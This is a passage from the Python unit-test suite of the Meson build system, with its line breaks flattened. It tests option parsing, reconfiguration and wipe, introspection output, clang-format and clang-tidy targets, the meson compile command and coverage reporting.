self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '0') # Command-line parsing of buildtype settings should be the same as # setting with `meson configure`. # # Setting buildtype should set optimization/debug self.new_builddir() self.init(testdir, extra_args=['-Dbuildtype=debugoptimized']) opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') # Setting optimization/debug should set buildtype self.new_builddir() self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true']) opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') # Setting both buildtype and debug on the command-line should work, and # should warn not to do that. Also test that --debug is parsed as -Ddebug=true self.new_builddir() out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug']) self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant') opts = self.get_opts_as_dict() self.assertEqual(opts['debug'], True) self.assertEqual(opts['optimization'], '2') self.assertEqual(opts['buildtype'], 'debugoptimized') @skipIfNoPkgconfig @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows') def test_native_dep_pkgconfig(self): testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var') with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile: crossfile.write(textwrap.dedent( '''[binaries] pkgconfig = '{0}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' endian = 'little' '''.format(os.path.join(testdir, 'cross_pkgconfig.py')))) crossfile.flush() self.meson_cross_file = crossfile.name env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')} self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env) self.wipe() self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env) @skipIfNoPkgconfig @unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows') def test_pkg_config_libdir(self): testdir = os.path.join(self.unit_test_dir, '46 native dep pkgconfig var') with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile: crossfile.write(textwrap.dedent( '''[binaries] pkgconfig = 'pkg-config' [properties] pkg_config_libdir = ['{0}'] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' endian = 'little' '''.format(os.path.join(testdir, 'cross_pkgconfig')))) crossfile.flush() self.meson_cross_file = crossfile.name env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir, 'native_pkgconfig')} self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env) self.wipe() self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env) def __reconfigure(self, change_minor=False): # Set an older version to force a reconfigure from scratch filename = os.path.join(self.privatedir, 'coredata.dat') with open(filename, 'rb') as f: obj = pickle.load(f) if change_minor: v = mesonbuild.coredata.version.split('.') obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)]) else: obj.version = '0.47.0' with open(filename, 'wb') as f: pickle.dump(obj, f) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '48 reconfigure') self.init(testdir, extra_args=['-Dopt1=val1']) self.setconf('-Dopt2=val2') self.__reconfigure() out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3']) self.assertRegex(out, 'Regenerating configuration from scratch') self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 default4') self.build() self.run_tests() # Create a file in builddir and verify wipe command removes it filename = os.path.join(self.builddir, 'something') open(filename, 'w').close() self.assertTrue(os.path.exists(filename)) out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4']) self.assertFalse(os.path.exists(filename)) self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 val4') self.build() self.run_tests() def test_wipe_from_builddir(self): testdir = os.path.join(self.common_test_dir, '158 custom target subdir depend files') self.init(testdir) self.__reconfigure() with Path(self.builddir): self.init(testdir, extra_args=['--wipe']) def test_minor_version_does_not_reconfigure_wipe(self): testdir = os.path.join(self.unit_test_dir, '48 reconfigure') self.init(testdir, extra_args=['-Dopt1=val1']) self.setconf('-Dopt2=val2') self.__reconfigure(change_minor=True) out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3']) self.assertNotRegex(out, 'Regenerating configuration from scratch') self.assertRegex(out, 'opt1 val1') self.assertRegex(out, 'opt2 val2') self.assertRegex(out, 'opt3 val3') self.assertRegex(out, 'opt4 default4') self.build() self.run_tests() def test_target_construct_id_from_path(self): # This id is stable but not guessable. # The test is supposed to prevent unintentional # changes of target ID generation. target_id = Target.construct_id_from_path('some/obscure/subdir', 'target-id', '@suffix') self.assertEqual('5e002d3@@target-id@suffix', target_id) target_id = Target.construct_id_from_path('subproject/foo/subdir/bar', 'target2-id', '@other') self.assertEqual('81d46d1@@target2-id@other', target_id) def test_introspect_projectinfo_without_configured_build(self): testfile = os.path.join(self.common_test_dir, '34 run program', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'run command') self.assertEqual(res['subprojects'], []) testfile = os.path.join(self.common_test_dir, '41 options', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'options') self.assertEqual(res['subprojects'], []) testfile = os.path.join(self.common_test_dir, '44 subproject options', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build'])) self.assertEqual(res['version'], 'undefined') self.assertEqual(res['descriptive_name'], 'suboptions') self.assertEqual(len(res['subprojects']), 1) subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files']) self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build'])) self.assertEqual(res['subprojects'][0]['name'], 'subproject') self.assertEqual(res['subprojects'][0]['version'], 'undefined') self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject') def test_introspect_projectinfo_subprojects(self): testdir = os.path.join(self.common_test_dir, '99 subproject subdir') self.init(testdir) res = self.introspect('--projectinfo') expected = { 'descriptive_name': 'proj', 'version': 'undefined', 'subproject_dir': 'subprojects', 'subprojects': [ { 'descriptive_name': 'sub', 'name': 'sub', 'version': '1.0' }, { 'descriptive_name': 'sub_implicit', 'name': 'sub_implicit', 'version': '1.0', }, { 'descriptive_name': 'sub-novar', 'name': 'sub_novar', 'version': '1.0', }, { 'descriptive_name': 'subsub', 'name': 'subsub', 'version': 'undefined' }, { 'descriptive_name': 'subsubsub', 'name': 'subsubsub', 'version': 'undefined' }, ] } res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name']) self.assertDictEqual(expected, res) def test_introspection_target_subproject(self): testdir = os.path.join(self.common_test_dir, '43 subproject') self.init(testdir) res = self.introspect('--targets') expected = { 'sublib': 'sublib', 'simpletest': 'sublib', 'user': None } for entry in res: name = entry['name'] self.assertEqual(entry['subproject'], expected[name]) def test_introspect_projectinfo_subproject_dir(self): testdir = os.path.join(self.common_test_dir, '76 custom subproject dir') self.init(testdir) res = self.introspect('--projectinfo') self.assertEqual(res['subproject_dir'], 'custom_subproject_dir') def test_introspect_projectinfo_subproject_dir_from_source(self): testfile = os.path.join(self.common_test_dir, '76 custom subproject dir', 'meson.build') res = self.introspect_directory(testfile, '--projectinfo') self.assertEqual(res['subproject_dir'], 'custom_subproject_dir') @skipIfNoExecutable('clang-format') def test_clang_format(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '54 clang-format') testfile = os.path.join(testdir, 'prog.c') badfile = os.path.join(testdir, 'prog_orig_c') goodfile = os.path.join(testdir, 'prog_expected_c') testheader = os.path.join(testdir, 'header.h') badheader = os.path.join(testdir, 'header_orig_h') goodheader = os.path.join(testdir, 'header_expected_h') try: shutil.copyfile(badfile, testfile) shutil.copyfile(badheader, testheader) self.init(testdir) self.assertNotEqual(Path(testfile).read_text(), Path(goodfile).read_text()) self.assertNotEqual(Path(testheader).read_text(), Path(goodheader).read_text()) self.run_target('clang-format') self.assertEqual(Path(testheader).read_text(), Path(goodheader).read_text()) finally: if os.path.exists(testfile): os.unlink(testfile) if os.path.exists(testheader): os.unlink(testheader) @skipIfNoExecutable('clang-tidy') def test_clang_tidy(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name)) if shutil.which('c++') is None: raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.') if is_osx(): raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.') testdir = os.path.join(self.unit_test_dir, '70 clang-tidy') dummydir = os.path.join(testdir, 'dummydir.h') self.init(testdir, override_envvars={'CXX': 'c++'}) out = self.run_target('clang-tidy') self.assertIn('cttest.cpp:4:20', out) self.assertNotIn(dummydir, out) def test_identity_cross(self): testdir = os.path.join(self.unit_test_dir, '71 cross') # Do a build to generate a cross file where the host is this target self.init(testdir, extra_args=['-Dgenerate=true']) self.meson_cross_file = os.path.join(self.builddir, "crossfile") self.assertTrue(os.path.exists(self.meson_cross_file)) # Now verify that this is detected as cross self.new_builddir() self.init(testdir) def test_introspect_buildoptions_without_configured_build(self): testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args) self.init(testdir, default_args=False) res_wb = self.introspect('--buildoptions') self.maxDiff = None self.assertListEqual(res_nb, res_wb) def test_meson_configure_from_source_does_not_crash(self): testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions') self._run(self.mconf_command + [testdir]) def test_introspect_buildoptions_cross_only(self): testdir = os.path.join(self.unit_test_dir, '84 cross only introspect') testfile = os.path.join(testdir, 'meson.build') res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args) optnames = [o['name'] for o in res] self.assertIn('c_args', optnames) self.assertNotIn('build.c_args', optnames) def test_introspect_json_dump(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') self.init(testdir) infodir = os.path.join(self.builddir, 'meson-info') self.assertPathExists(infodir) def assertKeyTypes(key_type_list, obj, strict: bool = True): for i in key_type_list: if isinstance(i[1], (list, tuple)) and None in i[1]: i = (i[0], tuple([x for x in i[1] if x is not None])) if i[0] not in obj or obj[i[0]] is None: continue self.assertIn(i[0], obj) self.assertIsInstance(obj[i[0]], i[1]) if strict: for k in obj.keys(): found = False for i in key_type_list: if k == i[0]: found = True break self.assertTrue(found, 'Key "{}" not in expected list'.format(k)) root_keylist = [ ('benchmarks', list), ('buildoptions', list), ('buildsystem_files', list), ('dependencies', list), ('installed', dict), ('projectinfo', dict), ('targets', list), ('tests', list), ] test_keylist = [ ('cmd', list), ('env', dict), ('name', str), ('timeout', int), ('suite', list), ('is_parallel', bool), ('protocol', str), ('depends', list), ('workdir', (str, None)), ('priority', int), ] buildoptions_keylist = [ ('name', str), ('section', str), ('type', str), ('description', str), ('machine', str), ('choices', (list, None)), ('value', (str, int, bool, list)), ] buildoptions_typelist = [ ('combo', str, [('choices', list)]), ('string', str, []), ('boolean', bool, []), ('integer', int, []), ('array', list, []), ] buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test'] buildoptions_machines = ['any', 'build', 'host'] dependencies_typelist = [ ('name', str), ('version', str), ('compile_args', list), ('link_args', list), ] targets_typelist = [ ('name', str), ('id', str), ('type', str), ('defined_in', str), ('filename', list), ('build_by_default', bool), ('target_sources', list), ('extra_files', list), ('subproject', (str, None)), ('install_filename', (list, None)), ('installed', bool), ] targets_sources_typelist = [ ('language', str), ('compiler', list), ('parameters', list), ('sources', list), ('generated_sources', list), ] # First load all files res = {} for i in root_keylist: curr = os.path.join(infodir, 'intro-{}.json'.format(i[0])) self.assertPathExists(curr) with open(curr, 'r') as fp: res[i[0]] = json.load(fp) assertKeyTypes(root_keylist, res) # Match target ids to input and output files for ease of reference src_to_id = {} out_to_id = {} for i in res['targets']: print(json.dump(i, sys.stdout)) out_to_id.update({os.path.relpath(out, self.builddir): i['id'] for out in i['filename']}) for group in i['target_sources']: src_to_id.update({os.path.relpath(src, testdir): i['id'] for src in group['sources']}) # Check Tests and benchmarks tests_to_find = ['test case 1', 'test case 2', 'benchmark 1'] deps_to_find = {'test case 1': [src_to_id['t1.cpp']], 'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']], 'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]} for i in res['benchmarks'] + res['tests']: assertKeyTypes(test_keylist, i) if i['name'] in tests_to_find: tests_to_find.remove(i['name']) self.assertEqual(sorted(i['depends']), sorted(deps_to_find[i['name']])) self.assertListEqual(tests_to_find, []) # Check buildoptions buildopts_to_find = {'cpp_std': 'c++11'} for i in res['buildoptions']: assertKeyTypes(buildoptions_keylist, i) valid_type = False for j in buildoptions_typelist: if i['type'] == j[0]: self.assertIsInstance(i['value'], j[1]) assertKeyTypes(j[2], i, strict=False) valid_type = True break self.assertIn(i['section'], buildoptions_sections) self.assertIn(i['machine'], buildoptions_machines) self.assertTrue(valid_type) if i['name'] in buildopts_to_find: self.assertEqual(i['value'], buildopts_to_find[i['name']]) buildopts_to_find.pop(i['name'], None) self.assertDictEqual(buildopts_to_find, {}) # Check buildsystem_files bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build'] bs_files = [os.path.join(testdir, x) for x in bs_files] self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files))) # Check dependencies dependencies_to_find = ['threads'] for i in res['dependencies']: assertKeyTypes(dependencies_typelist, i) if i['name'] in dependencies_to_find: dependencies_to_find.remove(i['name']) self.assertListEqual(dependencies_to_find, []) # Check projectinfo self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []}) # Check targets targets_to_find = { 'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'), 'staticTestLib': ('static library', True, False, 'staticlib/meson.build'), 'test1': ('executable', True, True, 'meson.build'), 'test2': ('executable', True, False, 'meson.build'), 'test3': ('executable', True, False, 'meson.build'), } for i in res['targets']: assertKeyTypes(targets_typelist, i) if i['name'] in targets_to_find: tgt = targets_to_find[i['name']] self.assertEqual(i['type'], tgt[0]) self.assertEqual(i['build_by_default'], tgt[1]) self.assertEqual(i['installed'], tgt[2]) self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3])) targets_to_find.pop(i['name'], None) for j in i['target_sources']: assertKeyTypes(targets_sources_typelist, j) self.assertDictEqual(targets_to_find, {}) def test_introspect_file_dump_equals_all(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') self.init(testdir) res_all = self.introspect('--all') res_file = {} root_keylist = [ 'benchmarks', 'buildoptions', 'buildsystem_files', 'dependencies', 'installed', 'projectinfo', 'targets', 'tests', ] infodir = os.path.join(self.builddir, 'meson-info') self.assertPathExists(infodir) for i in root_keylist: curr = os.path.join(infodir, 'intro-{}.json'.format(i)) self.assertPathExists(curr) with open(curr, 'r') as fp: res_file[i] = json.load(fp) self.assertEqual(res_all, res_file) def test_introspect_meson_info(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res1 = json.load(fp) for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']: self.assertIn(i, res1) self.assertEqual(res1['error'], False) self.assertEqual(res1['build_files_updated'], True) def test_introspect_config_update(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res1 = json.load(fp) self.setconf('-Dcpp_std=c++14') self.setconf('-Dbuildtype=release') for idx, i in enumerate(res1): if i['name'] == 'cpp_std': res1[idx]['value'] = 'c++14' if i['name'] == 'build.cpp_std': res1[idx]['value'] = 'c++14' if i['name'] == 'buildtype': res1[idx]['value'] = 'release' if i['name'] == 'optimization': res1[idx]['value'] = '3' if i['name'] == 'debug': res1[idx]['value'] = False with open(introfile, 'r') as fp: res2 = json.load(fp) self.assertListEqual(res1, res2) def test_introspect_targets_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json') self.init(testdir) self.assertPathExists(introfile) with open(introfile, 'r') as fp: res_wb = json.load(fp) res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args) # Account for differences in output res_wb = [i for i in res_wb if i['type'] != 'custom'] for i in res_wb: i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']] if 'install_filename' in i: del i['install_filename'] sources = [] for j in i['target_sources']: sources += j['sources'] i['target_sources'] = [{ 'language': 'unknown', 'compiler': [], 'parameters': [], 'sources': sources, 'generated_sources': [] }] self.maxDiff = None self.assertListEqual(res_nb, res_wb) def test_introspect_ast_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args) node_counter = {} def accept_node(json_node): self.assertIsInstance(json_node, dict) for i in ['lineno', 'colno', 'end_lineno', 'end_colno']: self.assertIn(i, json_node) self.assertIsInstance(json_node[i], int) self.assertIn('node', json_node) n = json_node['node'] self.assertIsInstance(n, str) self.assertIn(n, nodes) if n not in node_counter: node_counter[n] = 0 node_counter[n] = node_counter[n] + 1 for nodeDesc in nodes[n]: key = nodeDesc[0] func = nodeDesc[1] self.assertIn(key, json_node) if func is None: tp = nodeDesc[2] self.assertIsInstance(json_node[key], tp) continue func(json_node[key]) def accept_node_list(node_list): self.assertIsInstance(node_list, list) for i in node_list: accept_node(i) def accept_kwargs(kwargs): self.assertIsInstance(kwargs, list) for i in kwargs: self.assertIn('key', i) self.assertIn('val', i) accept_node(i['key']) accept_node(i['val']) nodes = { 'BooleanNode': [('value', None, bool)], 'IdNode': [('value', None, str)], 'NumberNode': [('value', None, int)], 'StringNode': [('value', None, str)], 'ContinueNode': [], 'BreakNode': [], 'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)], 'ArrayNode': [('args', accept_node)], 'DictNode': [('args', accept_node)], 'EmptyNode': [], 'OrNode': [('left', accept_node), ('right', accept_node)], 'AndNode': [('left', accept_node), ('right', accept_node)], 'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)], 'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)], 'NotNode': [('right', accept_node)], 'CodeBlockNode': [('lines', accept_node_list)], 'IndexNode': [('object', accept_node), ('index', accept_node)], 'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)], 'FunctionNode': [('args', accept_node), ('name', None, str)], 'AssignmentNode': [('value', accept_node), ('var_name', None, str)], 'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)], 'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)], 'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)], 'IfNode': [('condition', accept_node), ('block', accept_node)], 'UMinusNode': [('right', accept_node)], 'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)], } accept_node(res_nb) for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]: self.assertIn(n, node_counter) self.assertEqual(node_counter[n], c) def test_introspect_dependencies_from_source(self): testdir = os.path.join(self.unit_test_dir, '57 introspection') testfile = os.path.join(testdir, 'meson.build') res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args) expected = [ { 'name': 'threads', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'zlib', 'required': False, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'bugDep1', 'required': True, 'version': [], 'has_fallback': False, 'conditional': False }, { 'name': 'somethingthatdoesnotexist', 'required': True, 'version': ['>=1.2.3'], 'has_fallback': False, 'conditional': True }, { 'name': 'look_i_have_a_fallback', 'required': True, 'version': ['>=1.0.0', '<=99.9.9'], 'has_fallback': True, 'conditional': True } ] self.maxDiff = None self.assertListEqual(res_nb, expected) def test_unstable_coredata(self): testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) # just test that the command does not fail (e.g. because it throws an exception) self._run([*self.meson_command, 'unstable-coredata', self.builddir]) @skip_if_no_cmake def test_cmake_prefix_path(self): testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) @skip_if_no_cmake def test_cmake_parser(self): testdir = os.path.join(self.unit_test_dir, '65 cmake parser') self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')]) def test_alias_target(self): if self.backend is Backend.vs: # FIXME: This unit test is broken with vs backend, needs investigation raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name)) testdir = os.path.join(self.unit_test_dir, '66 alias target') self.init(testdir) self.build() self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt')) self.run_target('build-all') self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix)) self.assertPathExists(os.path.join(self.builddir, 'hello.txt')) def test_configure(self): testdir = os.path.join(self.common_test_dir, '2 cpp') self.init(testdir) self._run(self.mconf_command + [self.builddir]) def test_summary(self): testdir = os.path.join(self.unit_test_dir, '73 summary') out = self.init(testdir) expected = textwrap.dedent(r''' Some Subproject 2.0 string: bar integer: 1 boolean: True My Project 1.0 Configuration Some boolean: False Another boolean: True Some string: Hello World A list: string 1 True empty list: A number: 1 yes: YES no: NO coma list: a, b, c Plugins long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse, autodetect, avi Subprojects sub: YES sub2: NO Problem encountered: This subproject failed ''') expected_lines = expected.split('\n')[1:] out_start = out.find(expected_lines[0]) out_lines = out[out_start:].split('\n')[:len(expected_lines)] if sys.version_info < (3, 7, 0): # Dictionary order is not stable in Python <3.7, so sort the lines # while comparing self.assertEqual(sorted(expected_lines), sorted(out_lines)) else: self.assertEqual(expected_lines, out_lines) def test_meson_compile(self): """Test the meson compile command.""" def get_exe_name(basename: str) -> str: if is_windows(): return '{}.exe'.format(basename) else: return basename def get_shared_lib_name(basename: str) -> str: if mesonbuild.environment.detect_msys2_arch(): return 'lib{}.dll'.format(basename) elif is_windows(): return '{}.dll'.format(basename) elif is_cygwin(): return 'cyg{}.dll'.format(basename) elif is_osx(): return 'lib{}.dylib'.format(basename) else: return 'lib{}.so'.format(basename) def get_static_lib_name(basename: str) -> str: return 'lib{}.a'.format(basename) # Base case (no targets or additional arguments) testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) self._run([*self.meson_command, 'compile', '-C', self.builddir]) self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog'))) # `--clean` self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean']) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) # Target specified in a project with unique names testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir, extra_args=['--wipe']) # Multiple targets and target type specified self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library']) # Check that we have a shared lib, but not an executable, i.e. check that target actually worked self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib'))) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog'))) self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib'))) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog'))) # Target specified in a project with non unique names testdir = os.path.join(self.common_test_dir, '186 same target name') self.init(testdir, extra_args=['--wipe']) self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo']) self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo'))) self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo']) self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo'))) # run_target testdir = os.path.join(self.common_test_dir, '52 run target') self.init(testdir, extra_args=['--wipe']) out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi']) self.assertIn('I am Python3.', out) # `--$BACKEND-args` testdir = os.path.join(self.common_test_dir, '1 trivial') if self.backend is Backend.ninja: self.init(testdir, extra_args=['--wipe']) # Dry run - should not create a program self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n']) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) elif self.backend is Backend.vs: self.init(testdir, extra_args=['--wipe']) self._run([*self.meson_command, 'compile', '-C', self.builddir]) # Explicitly clean the target through msbuild interface self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))]) self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog'))) def test_spurious_reconfigure_built_dep_file(self): testdir = os.path.join(self.unit_test_dir, '75 dep files') # Regression test: Spurious reconfigure was happening when build # directory is inside source directory. # See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85. srcdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, srcdir) builddir = os.path.join(srcdir, '_build') self.change_builddir(builddir) self.init(srcdir) self.build() # During first configure the file did not exist so no dependency should # have been set. A rebuild should not trigger a reconfigure. self.clean() out = self.build() self.assertNotIn('Project configured', out) self.init(srcdir, extra_args=['--reconfigure']) # During the reconfigure the file did exist, but is inside build # directory, so no dependency should have been set. A rebuild should not # trigger a reconfigure. self.clean() out = self.build() self.assertNotIn('Project configured', out) def _test_junit(self, case: str) -> None: try: import lxml.etree as et except ImportError: raise unittest.SkipTest('lxml required, but not found.') schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd'))) self.init(case) self.run_tests() junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml')) try: schema.assertValid(junit) except et.DocumentInvalid as e: self.fail(e.error_log) def test_junit_valid_tap(self): self._test_junit(os.path.join(self.common_test_dir, '207 tap tests')) def test_junit_valid_exitcode(self): self._test_junit(os.path.join(self.common_test_dir, '42 test args')) def test_junit_valid_gtest(self): self._test_junit(os.path.join(self.framework_test_dir, '2 gtest')) def test_link_language_linker(self): # TODO: there should be some way to query how we're linking things # without resorting to reading the ninja.build file if self.backend is not Backend.ninja: raise unittest.SkipTest('This test reads the ninja file') testdir = os.path.join(self.common_test_dir, '226 link language') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: contents = f.read() self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER') self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER') def test_commands_documented(self): ''' Test that all listed meson commands are documented in Commands.md. ''' # The docs directory is not in release tarballs. if not os.path.isdir('docs'): raise unittest.SkipTest('Doc directory does not exist.') doc_path = 'docs/markdown_dynamic/Commands.md' md = None with open(doc_path, encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) ## Get command sections section_pattern = re.compile(r'^### (.+)$', re.MULTILINE) md_command_section_matches = [i for i in section_pattern.finditer(md)] md_command_sections = dict() for i, s in enumerate(md_command_section_matches): section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start() md_command_sections[s.group(1)] = (s.start(), section_end) ## Validate commands md_commands = set(k for k,v in md_command_sections.items()) help_output = self._run(self.meson_command + ['--help']) help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(',')) self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path)) ## Validate that each section has proper placeholders def get_data_pattern(command): return re.compile( r'^```[\r\n]' r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]' r'^```[\r\n]' r'.*?' r'^```[\r\n]' r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]' r'^```', flags = re.MULTILINE|re.DOTALL) for command in md_commands: m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1]) self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path)) def _check_coverage_files(self, types=('text', 'xml', 'html')): covdir = Path(self.builddir) / 'meson-logs' files = [] if 'text' in types: files.append('coverage.txt') if 'xml' in types: files.append('coverage.xml') if 'html' in types: files.append('coveragereport/index.html') for f in files: self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f)) def test_coverage(self): if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2') gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr() if not gcovr_exe: raise unittest.SkipTest('gcovr not found, or too old') testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_id() == 'clang': if not mesonbuild.environment.detect_llvm_cov(): raise 